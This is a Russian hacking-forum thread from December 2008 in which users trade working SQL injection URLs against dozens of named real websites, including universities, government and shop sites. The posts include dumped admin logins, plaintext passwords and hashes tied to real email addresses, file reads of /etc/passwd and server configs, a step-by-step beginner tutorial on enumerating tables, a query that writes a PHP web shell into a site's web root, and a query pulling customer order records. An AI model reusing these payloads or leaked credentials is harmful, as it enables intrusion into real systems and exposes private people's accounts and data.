Просмотр полной версии : SQL Инъекции
http://www.feltbikes.de
5.0.32-Debian_7etch6:root@localhost:felt_artikel
http://www.feltbikes.de/cross.php?id=-4+union+select+1,2,3,4,load_file(0x2f7661722f77777 72f66656c742f6c6962726172792e706870),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41/*
------------------------------------------------------------------------
http://www.furisto.de
5.0.32- Debian_7etch5:sk0223 2@localhost:usr_sk02 232_1
http://www.furisto.de/component/option,com_ownbiblio/index.php?option=com_ownbiblio&view=catalogue&year=All&catid=1+union+select+1,2,3,concat(username,char(58 ),password),5,6,7,8,9,10,11,12,13,14,15,16,17+from +jos_users+limit+1,100/*------------------------------------------------------------------------
http://digital.tomsk.ru
4.0.27-log:digitalwww@localhost
http://digital.tomsk.ru/?IDcatalog=975155&ItemID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
------------------------------------------------------------------------
http://www.diac.ru
http://www.diac.ru/news/comments.php?news_id=-1+union+select+1,2,3,4,5,6,7,8/*
------------------------------------------------------------------------
http://calendar.hpu.edu
Самое вкусное)) - еду!
http://calendar.hpu.edu/event_details.php?event_id=-2555+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40/*
5.0.26-standard:root@localhost:calendar
Подбираем таблицы и колонки!
Еще доступна читалка load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd
load_file(0x2f6574632f706173737764) - function.php
/data0/httpd/calendar/htdocs - Дира!
http://calendar.hpu.edu/admin/ - Админка!
+ Можно перебирать колонки и таблицы! =)
------------------------------------------------------------------------
http://www.roguegovernment.com
4.1.22-standard:roguegov_publicr@localhost:roguegov_rgov
http://www.roguegovernment.com/news.php?id=-4682+union+select+1,2,3,4,5,6/*
------------------------------------------------------------------------
http://www.paristoutcourt.org
5.0.45-Debian_1ubuntu3.3-log:paristoutcourtor@88.191.253.131:paristoutcourt or
Есть таблица: ptc_users
Поля в таблице: user_login,user_pass,user_email
http://www.paristoutcourt.org/blogs/blog.php?id=7&blog=-1+union+select+1,2,concat_ws(char(58),user_login,u ser_pass,user_email),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17+from+ptc_users/* Дальше через limit
------------------------------------------------------------------------
http://www.viaggiavventurenelmondo.it
5.0.45-Debian_1ubuntu3.3-log:anm_sites@172.17.12.13:cdocanm
Таблица: user
Колонки: login,password
http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=1+union+select+1,concat(login,char(58 ),password),3,4,5,6,7,8,9+from+user/* Дальше через limit
------------------------------------------------------------------------
http://www.kvartira-omsk.ru
5.0.27-standard-log:vashakvartira@localhost:vashakvartira
5ая версия - можно искать таблицы!
------------------------------------------------------------------------
http://www.easybackline.fr
4.1.11-Debian_4sarge7:easybkline@hebergement.oc3.fr:easyb kline
С этим сайтом работае через unhex(hex(...))
------------------------------------------------------------------------
http://www.cliocup.fr
5.0.44-log:root@localhost:wsr
5ая версия! Можно перебирать...
Так же есть читалка через load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd
------------------------------------------------------------------------
spherics
05.12.2008, 11:41
Пора делать ставки на лошадей *). Казино там итд. В общем таблицы не подобрал буду рад если кто нить подберёт.
http://www.gohorsebetting.com/horseracing/news.php?id=1666+union+select+1,version(),user(),d atabase()/*
Version:4.1.20
Database: allhorse
user: dbconnect@localhost
Индийцы отжигают *)
http://www.superbindia.com/audios/player.php?id=-1426/**/union/**/select/**/1,version(),user(),database(),5,6,7--
Database Version: 5.0.51a-community
Database name: nirup_superbindia
User name: nirup_arupreddy@localhost
http://www.hiva.be/publicatie_detail_en.php?id=1803[sql]
Dbname: hiva_web
Version: 5.0.18-nt
User: admin@localhost
куча таблиц
mysql.user
localhost:admin:08bda1f87564a3c5 hilda
localhost:rik:78a42964266735dd rik
%:root:36b5abe15fece604 142857
localhost:guest:guest
%:admin:08bda1f87564a3c5
%:liesbeth:1913a30641551198
%:elise:6e0fd8903542daf2 elise
table account_paswoord from database steunpunt_loopbanen
id:email:domain:paswoord
1:ides.nicaise@hiva.kuleuven.be:centraal:Linabdal
2:hubert.cossey@hiva.kuleuven.be:centraal:Jwaal123
3:sonja.wuyts@hiva.kuleuven.be:centraal:SoWu3110
4:beatrijs.defraine@ped.kuleuven.be:OD1:dummy
5:patrick.onghena@ped.kuleuven.be:OD1:bAch3500
6:peter.vanpetegem@ua.ac.be:OD1:hlrctal
7:pol.ghesquiere@ped.kuleuven.be:OD1:dummy
8:rita.rymenans@ua.ac.be:OD1:retuow
9:lieven.verschaffel@ped.kuleuven.be:OD1:dummy
10:rianne.janssen@ped.kuleuven.be:OD1:Nobo9632
http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-158+union+select+1,version(),3,4,5/*
4.1.22-standard
http://www.warrenpointharbour.co.uk/service_details.php?category_id=1+order+by+15 - воть!!! Что-то переадресация с union select не АЙС!! Тама сами крутите если получится, напишу!!
Воть еще тоже с переадресацией http://www.polymercentre.ru/show.php?id=180'+order+by+1&PHPSESSID=3e29a48f71b14b1eae4ce3161e65ac50
Вот еще http://www.axonsport.ru/doc/doc.php?ID=35'
Воть крутанул : http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4
Версия: 5.0.45
Воть для новичков разжую:
http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4 - Так узнаем версию
Поскольку версия 5+ то в ней присутсвует - information_schema .... начинаем копаться в ней!!!
http://vklybe.ru/index.php?o=g&id=-167+union+select+table_name,2,3,4+from+information _schema.tables+limit+17,1 и так меняем до +limit+87,1 тама смарите, что вам нужно!
Каким же способом посмареть дапустим таблицу modx_web_users - это limit+85,1 ?? Да очень просто!!! Идем на сайт http://k0x.ru/encoder/index.php ! И в поле Text* пишем modx_web_users и жмем Send! После тама появятся поля, нам нужно самое первое, тобишь HEX тама будет вот такое 0x6d6f64785f7765625f7573657273 ! Это Sql HEX ! Вообще можно просто перевести слово через любую вашу прогу(сайт) и просто добавляем 0x ! Вот такой запрос нужно сделать после того как мы узнали Hex код таблицы modx_web_users :
http://vklybe.ru/index.php?o=g&id=-167+union+select+column_name,2,3,4+from+informatio n_schema.columns+where+table_name=0x6d6f64785f7765 625f7573657273+limit+1,1
Ну вот мы нашли всеми долгожданный username и password ! всё также просматривается через limit+1,1 , limit+2,1 и т.д.
Ну потом смотрим юзернаймы и пассы!!!
4.1.20
http://www.communityaction.us/index.php?id=-392+union+select+version()/*
5.0.67-log(Windows)
http://inuitcircumpolar.indelta.ca/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x40,table_schema,table_name),13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 +from+information_schema.tables+limit+17,1--&Lang=En
5.0.45-log
http://www.cpod.org.au/feed.php?id=6+and+1=0+union+select+1,2,3,version() ,table_schema,6,table_name,8+from+information_sche ma.tables+limit+109,1/*
BanQui
http://www.axonsport.ru/doc/doc.php?ID=35'+union+select+1,2,version(),4/*
http://www.choice s.edu/resources/detail.php?id=-26+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28--
4.1.14-log
http://www.fis k.edu/page.asp?id=158+and+1=-1+union+select+1,@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )
http://www.cese.utulsa.edu/content.jsp?id=-17+union+select+1,database(),3--
Помогите раскрутить http://db.zenyro.ru/items/potions/detail/575l.htm'
max_pain89
06.12.2008, 02:43
Помогите раскрутить http://db.zenyro.ru/items/potions/detail/575l.htm'
Крутить данную бестолку, т.к. ничего интересного этот запрос не представляет. Есть более удобный файл с ПОСТ запросом. Времяни на это у меня нет, но скажу по секрету, что версия Мускула там 5ая, а это значит есть information_schema. Для работы лучше используй тулзу на PHP из этой темы https://forum.antichat.ru/thread19844.html (нижний пост).
POST http://ТОТСАЙТ.ru/mob_search.html HTTP/1.0
Host: ТОТСАЙТ.ru
filter[mod_name]=mob_search&filter[name]=Fabre%'+AND+SUBSTRING((SELECT+version()+FROM+ragn adb.mob_db+LIMIT+0,1),1,1)=5#
Вот о чем я примерно.
Твой запрос не фурычит,или мой моск не фурычит))
http://www.audit.kharkov.com/news.php?id=99999+union+select+1,2,version(),user( ),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20/*
version: 5.0.41-community
user: gkcomua_global@localhost
database: gkcomua_global
Таблицы:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
articles
autors
autors_info
comments
session
activities
cities
config
countries
currencies
formoflaw
pictures
purchase
sale
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
baza
dop_inf
doska
fen_category
Обратите внимание на это :)
форум => группы => просмотреть информацию
ссылка: http://www.audit.kharkov.com/forum1/groupcp.php?g=22&sid=ae20327f81b80ed5fd34b4bbc37154a8
http://www.diotravel.ru/index.php?id=99999+union+select+1,2,3,4,5,version( )/*
version: 4.1.22-log
user: diotrav2_dio@localhost
database: diotrav2_dio
http://cdbara n.com/detail.php?id=-241+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+information_schema.tables--
version 5
spherics
06.12.2008, 06:08
http://teknews.net/details.php?id=-41839+union+select+1,2,version(),database(),5,user (),7,8,9--
Version: 5.0.51a-3ubuntu5.4
user: teknews@localhost
database: teknews
http://www.online-publishers.org/newsletter.php?newsId=164+union+select+1,2,version (),user(),5,6,7,8,9,database(),11,12,13,14,15,16,1 7,18,19,20,21,22,23/*
version: 4.1.20
user: opaadmin@localhost
database: OPA
http://www.nepaltravelnews.com/news.php?nid=207+union+select+1,2,3,version(),user (),database(),7,8,9,10,11,12,13,14--&&page=nid
version: 5.0.51a-community
user: travel_ntn@localhost
database: travel_travel
http://www.insanely-great.com/news.php?id=-9905+union+select+1,2,user(),version(),5,6,databas e(),8,9,10,11,12,13,14,15,16,17,18/*
version: 4.1.21-log
user: flamini_flaminio@216.14.208.109
database: flamini_igm
Крутить данную бестолку, т.к. ничего интересного этот запрос не представляет. Есть более удобный файл с ПОСТ запросом. Времяни на это у меня нет, но скажу по секрету, что версия Мускула там 5ая, а это значит есть information_schema. Для работы лучше используй тулзу на PHP из этой темы https://forum.antichat.ru/thread19844.html (нижний пост).
POST http://ТОТСАЙТ.ru/mob_search.html HTTP/1.0
Host: ТОТСАЙТ.ru
filter[mod_name]=mob_search&filter[name]=Fabre%'+AND+SUBSTRING((SELECT+version()+FROM+ragn adb.mob_db+LIMIT+0,1),1,1)=5#
Вот о чем я примерно.
Слу пожалуйста покрути её немного! Я блин тама в этом скульном скрипте все заполнил, вроде прально а он мне пишет:
Невозможно провести sql инъекцию, возможно:
1. Данные введены не правильно
2. Передача данных выбранным методом невозможна для данного сайта
Плиизззз покрути ето! МНЕ ОЧЕНЬ НУЖНО!!!!
http://www.gryphon.org.au/gallery/pictures/showPicture.php?album=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
5.0.67:gryphon@localhost:gryphon
http://www.gryphon.org.au/gallery/pictures/showPicture.php?album=-1+union+select+1,concat_ws(0x3a,user,password)+fro m+mysql.user--
root:*A0BA0CCDEF2E7FAEF16510E7F845108919D1D778 phpmyadmin:*45988B8EBD97ABF91FE3ADFEFA92BE3FBA859C A0
debian-sys-maint:5628c5d468086ccb
mysql:652f9c175d1914f9
gryphon:2314d08b327c439a
xrms:420fe7a60860988c
nuke:7947670723f0a05b
primequalitymeat:3d6a72ce055ea240
anta:2210636e65fe3992
bytesys:0e091d0759fdd203
autism:0a53f5a70675ac01
backup:*A11C33EBF4C6044E919113E6BC70408DA6A665CE
zubah:2e77180b427b3418
carl:*CEEBD0B5C31056DC20AB5E97EC94EE8F5AB70C12
sugarcrm:110832a12c60f2c7
sugarcrm:*2444EE85885C0FA09B328E49FDD203B0E508BE38
ajexa:7726ea7663fab356
ajexa:*CB1645B337E2753340EA7B99D6F88509B55D03DE
....
etc
:D http://www.vibb.at/gallery/showpicture.php?id=-1+union+select+1,2,3,4,5+from+users/*
no printable
http://www.soostheglobe.nl/albums/showpicture.php?albumid=61&photo=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3--
4.1.20-log:pays@localhost:soos
http://www.bertemu.us/showpicture.php?pic=21241+union+select+1,concat_ws (0x3a,version(),user(),database())/*
4.1.22-standard:bertemu_remko@localhost:bertemu_bertemu
http://rybalka.zooclub.ru/article.php?id=999999+union+select+1,concat_ws(0x3 a,user(),database(),version()),3--
user():zooclub_zooclub@localhost
database():zooclub_rybalka
version():5.0.67-community-log
http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),d atabase(),version()),8,9,10/*
user():pollan_article@localhost
database():pollan_articles
version():4.1.22-standard
http://www.tnufacenter.com/rus/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,us
er(),database(),version()),5/*
user():ofer@localhost
database():tnufacenter
version():5.0.22-community-nt
http://www.energovent.com/ru/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version())/*
user():dbu_dolbik_1@192.168.5.56
database():db_dolbik_5
version():4.1.22-log
http://ve.free-travels.ru/books/item.php?id=9999999+union+select+1,2,3,4,5,6,7,8,9 ,10
,11,concat_ws(0x3a,user(),database(),version()),13 ,14,15/*
user():gb_x_free_9e1@81.176.226.194
database():gb_x_free_9e1
version():5.0.45-community-nt-log
http://sistem.by/main.php?catid=-1+union+select+concat_ws(0x3a,user(),database(),ve rs
ion())/*
user():sysby@localhost
database():sysby
vaersion():5.0.41
http://www.sokol-mebel.ru/dressers/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(
0x3a,user(),database(),version()),8,9--
user():u97809@10.10.223.241
database():u97809
version():5.0.67-log
http://www.garo.cc/text.php?pageid=999999+union+select+1,2,3,concat_w s(0x3a,user(),database(),version()),5,6,7,8,9--
user():u7114@10.10.153.191
database():u7114
version():5.0.67-log
http://www.zvi.ru/item.php?id=999999999+union+select+1,2,concat_ws(0 x3a,user(),database(),version()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,
29,30,31--
user():szvi@localhost
database():shop2
version():5.0.26
www.azffc.org PR=5
http://www.azffc.org/show_page.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,user(),15,16,17,18,19,20,21,22--
Version() - 5.0.45-log
Таблицы:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
articles
attachments
cases
config
content
homepage
images
images_pages
ips
lawyers
news
pages
questions
random_image
registrations
trivia
crnc.org PR=6
http://www.crnc.org/viewnews.php?id=-1+union+select+1,version(),user(),4,5,6,7--
Version() - 5.0.51a-log
Таблицы:
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
activity
admin
articles
images
members
page_contents
states
masternet
06.12.2008, 21:09
http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6--
5.0.67-log - harlem_5@209.68.4.232 - harlem_live
http://www.dissentmagazine.org/online.php?id=-1+union+select+1,concat(version(),char(32,45,32),u ser(),char(32,45,32),database()),3,4,5,6,7,8,9,10--
4.1.22 - dissent@localhost - dissent
Адрес: polutona.ru (89.108.64.84)
Google PR 4 / 10
Яндекс тІЦ 500
http://polutona.ru/?show=reflect&number=-25+union+select+1,concat_ws(0x203a20,user(),versio n(),database())+from+news/*
User() polutonf_poluton@localhost
Version() 4.1.22-log
Database() polutonf_polutonf
yo.ru
http://yo.ru/element.php?element_id=-130+union+select+1,2,3,version(),5--&id=832
xxx.ru
http://www.xxx.ru/index.php?action=anketa&header=false&type=ind&id=-3316+union+select+1,2,3,4,concat_ws(0x3a,login,pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40+from+users++where+id=1+limit+0,1/*
http://www.xxx.ru/admin
admin:65536
password.ru
http://password.ru/index.php?date=27.11.2008&cat=-1+union+select+version()
password.ru/admin/admin.php
http://password.ru/index.php?date=27.11.2008&cat=-1+union+select+concat_ws(0x3a,name,value)+from+_co nfig
frame.ru
http://frame.ru/sqlmodel.php?index=-664+union+select+1,2,3,version(),5/*
infra.ru
http://infra.ru/fotogallery.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,user_password)))+from+jykwepb_forum.forum_use rs+where+user_level=1+limit+0,1
хешш разшифруйте и будет шелл )
tonnel.ru
http://www.tonnel.ru/?l=foto&foto=-2'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15/*
lolbot.ru
http://lolbot.ru/files/?c=1&s=2%20and%20(select%20ascii(substr(database(),3,1) )%20%20)%3E96%20and%201=1
Cageprisoners.com
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,version(),5,6--
version - 5.0.45
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,table_name,5,6+from+infor mation_schema.tables+limit+17,1-- - admins...
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,concat_ws(username,0x3a,p assword),5,6+from+admins--
Mr. Admin:QYYoUiD1cbIlTi2jPbgoQ0
www.lv - Латвийский каталог, PR6
http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/*
http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(database( ),1),1),3,4,5,6/*
http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/**/from/**/resources/*
database: t_welcome
user: welcome@92.240.65.129
version: 4.1.15-Debian_1ubuntu5-log
http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(id,1),1), 3,4,5,6/**/from/**/resources/*
http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(lang,1),1 ),3,4,5,6/**/from/**/resources/*
http://www.lv/list.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(url,1),1) ,3,4,5,6/**/from/**/resources/*
http://www.lv/list.php?id=-1+union+select+1,2,3,4,5,6/**/from/**/mysql.user/*
SELECT command denied to user 'welcome'@'92.240.65.129' for table 'user'
www.codurisursa.ro, тИЦ = 10
http://www.codurisursa.ro/print.php?id=-1+union+select+1,2,3,user(),5,6,7,8,database(),10, version(),12,13,14,15,16,17,18,19,20,21,22--
version() - 5.0.67-community-log
user() - scoduri_sc@localhost
database() - scoduri_sc
логины, хэши паролей админов и юзеров(все):
http://www.codurisursa.ro/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(id,0x3A,user ,0x3A,password),10,11,12,13,14,15,16,17,18,19,20,2 1,22+from+users+limit+0,1--
1:admin:e4ea62f22090e998738d70a407f86cfc:bdvm
админка здесь: http://www.codurisursa.ro/admin.php
-----------------------
www.postindustrial.net, тИЦ = 210
http://www.postindustrial.net/content2/show_text.php?razdeli_id=0&table=books&sql=razdeli_show&lang=russian&books_id=-1+union+select+1,version(),database(),user(),5,6,7/*
version() - 4.0.26
user() - postindu@yox.hc.ru
database() - wwwpostindustria
-----------------------
www.uatm.com.ua, тИЦ = 110
http://www.uatm.com.ua/show_art.php?who=-1+union+select+1,2,3,concat(version(),':',database (),':',user()),5/*
version() - 4.0.27
database() - reg_registeredcomua
user() - regcomua@localhost
-m0rgan-
07.12.2008, 18:59
http://www.brotherblue.com/pages.php?pageid=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login, password),9+from+users/*
логин/пасс:
planettech:plpIT3xz.Z.KE
---------------------------------------------------------
http://www.goodbetterbestler.com/get-mike.php?GetID=-126+union+select+1,2,concat_ws(0x3a,username,0x3a, password)+from+users/*
логин/пасс:
mike:xxOUrOW68gTuM
----------------------------------------------------------
http://www.simbin.se/news.php?newsid=-84+UNION+SELECT+1,2,3,concat_ws(0x3a,username,pass word),5+from+users/*
логин/пасс:
newsadmin:fb77bb3fb971d583ebb3cd8ddc61b299cecee108
------------------------------------------------------------
The End!
P.S.:Вроде не баян=)
P.S.S.:Скоро насобираю ещё=)))
Neoveneficus
07.12.2008, 19:22
Вывод в <title>
(магазинчик)
http://www.spectrumaudio.com/manprods.php?id=-69+UNION+SELECT+1,CONCAT(ordID,0x3a,ordSessionID,0 x3a,ordName,0x3a,ordAddress,0x3a,ordCity,0x3a,ordS tate,0x3a,ordZip,0x3a,ordCountry,0x3a,ordEmail,0x3 a,ordPhone,0x3a,ordShipName,0x3a,ordShipAddress,0x 3a,ordShipCity,0x3a,ordShipState,0x3a,ordShipZip,0 x3a,ordShipCountry,0x3a,ordAuthNumber,ordAuthNumbe r,0x3a,ordAffiliate,0x3a,ordPayProvider,0x3a,ordSh ipping,0x3a,ordStateTax,0x3a,ordCountryTax,0x3a,or dHSTTax,0x3a,ordHandling,0x3a,ordShipType,0x3a,ord Total,0x3a,ordDate,0x3a,ordIP,0x3a,ordDiscount,0x3 a,ordDiscountText,0x3a,ordExtra1,0x3a,ordExtra2,0x 3a,ordAddInfo,0x3a,ordComLoc,0x3a,ordStatus,0x3a,o rdStatusDate,0x3a,ordStatusInfo,0x3a,ordAddress2,0 x3a,ordShipAddress2,0x3a,ordExtra3,0x3a,ordTrackNu m,0x3a,ordAVS,0x3a,ordCVV,0x3a,ordInvoice,0x3a,ord ShipCarrier),3,4+FROM+spect9_spectrumaudio.orders+ limit+0,1--
Thrasher88
07.12.2008, 19:57
Подскажите, как раскрутить скулю:
http://smartlip.com/symbian/fileshare/flist.php?cat=1'
Вроебы инъекция есть, но что то даже рабочие поля найти не получается :((
0nep@t0p
07.12.2008, 20:05
www.sestran.gov.uk
http://www.sestran.gov.uk/news/article.php?ID=-17+union+select+1,concat(email,0x3a,password),3,4, 5,6,7+from+admin_users--
Version: 5.0.67-community
User: Andy@localhost
www.pancsoc.org.uk
http://www.pancsoc.org.uk/showmeeting.php?id=61+union+select+1,2,concat(user name,0x2e,password),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23+from+users+limit+1,1/*
Version: 5.0.22-Debian_0ubuntu6.06.5-log
User: Pancsoc@localhost
www.rugby.gov.uk
http://www.rugby.gov.uk/site/custom_scripts/wcsc_display.php?groupid=-453+union+select+load_file(0x453A5C50726F6772616D2 046696C65735C4170616368652047726F75705C41706163686 5325C6A6164755C7075626C69635F68746D6C5C736974655C6 96E636C756465735C666F6F7465722E706870),2,3,4/*
Version: 4.1.21-community-nt
User: ufs@localhost
diglib.lib.utk.edu
http://diglib.lib.utk.edu/utj/browse.php?jid=1&vid=2&issid=5&aid=-211+union+select+1,2,3,4,5,sin(pi()/3)--
Version: 4.1.22
User: utjuser@localhost
www.crefal.edu.mx
http://www.crefal.edu.mx/noticias/noticia1.php?pagina=1&id=-111+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,us er(),version(),database()),10,11,12/*
Version: 5.0.22
User: vmesa@yreri.crefal.edu.mx
www.boxclever.ca
http://www.boxclever.ca/news.php?id=75+and+1=3+union+select+1,2,convert(us er(),binary),4,5/*
Version: 4.1.13a
User: boxclever.ca@localhost
www.metroeast.org
http://www.metroeast.org/articles/show.php?id=-132+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+information_schema .tables/*
Version: 5.0.45
User: websitesql@localhost
Thrasher88
http://smartlip.com/symbian/fileshare/flist.php?cat=-1%27+or+1=1--++1
тема для вопросов здесь http://forum.antichat.ru/threadedpost982014.html
-m0rgan-
07.12.2008, 21:21
http://www.netsetup.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,userp ass),5,6+from+auth_users--
логин/пасс:
harold:dfb5e2a33dc5372e6971b2dde90145ce
marc:3e3dcdc5cbb5196312d1e5def7b74806
peter:2547b2647e4860b41b570ce658e6e24b
erwin:cbd6326b959161bc0234e9c549f77034
--------------------------------------------------------
The End
Аварийное отключение компа=(((
Остальные скули выложу поже...
masternet
07.12.2008, 21:36
http://hemuspartners.com/ask.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32), version(),user(),database()),7,8,9,10,11,12,13,14--
5.0.67-community - stefanwo_partner@localhost - stefanwo_hemusprt
http://www.computerclinic.on.ca/ask.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard - rarmstrong_usr@localhost - rarmstrong_db
http://www.esqway165.com/faq.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard-log - esqwa206@localhost - esqwa206_phpbb1
http://ppcolonic.com/ask.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7--
5.0.41-community-log - ppcolonic_pspg@localhost - ppcolonic_db
Thrasher88
07.12.2008, 21:44
www.harlemstage.org
http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,user(),database(),version(),6--
Version: 5.0.67-log
User: harlem_5@209.68.4.232
Database: harlem_live
sql: http://www.southworth.com/page.php?id=-1+union+select+password+from+users--
вытащил:
kelly;meex
Maryann;Meeks
но...не подходит.
админка http://www.southworth.com/manage
baltazar
07.12.2008, 22:51
http://www.thebiggreen.net/article.php?id=952+and+1=0+union+select+1,@@versio n,3,4,5,6,7,8,9,10,11--
http://www.mediatunisie.com/news-web-sites-tunis-tunisia.php?id=-6+union+select+1,version(),3,4/*
http://www.sitecom.com/reviews_view.php?review=Disk+ID+-+LN-117+Disk+ID+5+stars&reviewitem=null union all select 1,2,3,4,5,6,7,8,9,10--
http://www.e-maximfashion.com/news.php?news_id=-2%20union%20all%20select%201,2,3,4,5,concat(userna me,0x3a,password),7,8,9,10%20from%20admin%20--
user: admin pass: emax2006
Админка- http://www.e-maximfashion.com/admin/
http://www.meshop.ws/detail.php?id=-2+union+select+1,2,3,concat(user,0x3e,pass),5,6,7, 8,9,10,11,12,13,14,15,16,17,18+from+user--
d1aVOL
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,user,passw ord)))+from+mysql.user--
root
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/passwd%27)))+from+mysql.user+limit+0,1--
кавычки не фильтрует
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/httpd/conf/httpd.conf%27)))+from+mysql.user+limit+0,1--
узнаем пути и сайты на сервере )
<VirtualHost 72.3.131.57:80>
DocumentRoot /var/www/html
ServerName southworth.com
ServerAlias www.southworth.com ...
<Directory "/var/www/html">
allow from all
Options +Indexes
</Directory>
LogLevel emerg
CustomLog /var/log/httpd/sw_access_log combined
</VirtualHost>
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/bsinclude.inc%27)))+from+mysql.user+limit+0,1--
смотрим конфиг админки
$bshostname="localhost";
$bsusername="swdata";
$bspassword="dataB88";
$bsdatabase="southworthbs";
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/.htpasswd%27)))+from+mysql.user+limit+0,1--
ну и самое главное пароли к админке:
cservice:12gesqQWYvu66
sieraci:70X9knvrU05jc
southworth:WjEHl7rauDQhc
что за хеш?
http://www.southworth.com/page.php?id=-1+union+select+%27vital evil php%27+into+outfile+%27/var/www/html/images/main2/_notes/s.php%27--
ну и конешно залитие шелла ) токо папку на запись остается наити тебе )
усе успешного вам хека! ;)
Pashkela
08.12.2008, 02:25
http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,version(),3,4,5,6%60
http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,unhex(hex(GROUP_CONCAT(user_ name,0x3A,password))),3,4,5,6+from+adm_users%60
Версия MySQL:
5.0.58
-------
Имя базы:
traveleurope
-------
Юзер:
fiere@192.168.1.170
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------
mysql user:
srv1
-------
mysql password:
6f14f6e867cffa2c
masternet
